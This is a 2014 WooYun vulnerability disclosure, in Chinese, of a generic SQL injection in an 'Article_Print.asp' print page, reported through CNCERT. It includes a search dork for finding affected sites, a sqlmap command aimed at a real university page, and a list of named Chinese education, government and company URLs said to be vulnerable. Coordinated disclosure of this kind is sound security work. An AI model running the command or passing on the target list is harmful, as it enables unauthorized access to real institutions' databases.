当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086457

漏洞标题:某系统打印功能通用sql注入(大量教育、政府、企业网站在用)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-12-09 18:12

修复时间:2015-03-09 18:14

公开时间:2015-03-09 18:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-09: 细节已通知厂商并且等待厂商处理中
2014-12-14: 厂商已经确认,细节仅向厂商公开
2014-12-17: 细节向第三方安全合作伙伴开放
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-09: 细节向公众公开

简要描述:

某系统打印功能通用sql注入(大量教育、政府网站在用)

详细说明:

inurl:Article_Print.asp?ArticleID=

0.png


该“打印功能程序”使用量惊人,涉及教育、政府、企业等各行各业,以下案例使用Article_Print.asp的程序绝对属于同一套。
sqlmap.py -u "http://lixue.henau.edu.cn/Article_Print.asp?ArticleID=674" --tables

1.png


2.png


3.png


教育网站案例:
http://lixue.henau.edu.cn/Article_Print.asp?ArticleID=674
http://dep.yctc.edu.cn/chinese/wlkc/gggxx/Article_Print.asp?ArticleID=32
http://dept.wyu.edu.cn/wlsyzx/Article_Print.asp?ArticleID=1084
http://jpkc.njau.edu.cn/sketch/Article_Print.asp?ArticleID=969
http://db1.hut.edu.cn/Article_Print.asp?ArticleID=2004
http://www.cls.hznu.edu.cn/hjhx/Article_Print.asp?ArticleID=573
http://www2.ouc.edu.cn/sbc/Article_Print.asp?ArticleID=261
http://tw.gzhu.edu.cn/Article_Print.asp?ArticleID=2392
http://xsc.hnfnu.edu.cn/Article_Print.asp?ArticleID=188
http://country.whpu.edu.cn/Article_Print.asp?ArticleID=725
http://caiwu.bigc.edu.cn/Article_Print.asp?ArticleID=247

漏洞证明:

政府案例:
http://enping.gov.cn/ri/Article_Print.asp?ArticleID=112

4.png


http://www.yccyst.gov.cn/Article_Print.asp?ArticleID=188
http://www.xyyj.gov.cn/Article_Print.asp?ArticleID=50
http://www.bjczjd.gov.cn/Article_Print.asp?ArticleID=414
http://www.hzsccdc.gov.cn/Article_Print.asp?ArticleID=85
http://www.cnwmw.gov.cn/Article_Print.asp?ArticleID=409
http://www.sdgem.gov.cn/Article_Print.asp?ArticleID=183
http://www.qhxfwzx.gov.cn/Article_Print.asp?ArticleID=487
http://www.wenan.gov.cn/other/new/Article_Print.asp?ArticleID=3165
http://www.lxjjw.gov.cn/news/Article_Print.asp?ArticleID=1282
http://www.gyqlgk.lf.gov.cn/new/Article_Print.asp?ArticleID=146
企业案例:不多举例子了
http://www.nmgbr.com/Article_Print.asp?ArticleID=883
搜索引擎不计其数

修复方案:

@@

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-12-14 12:21

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无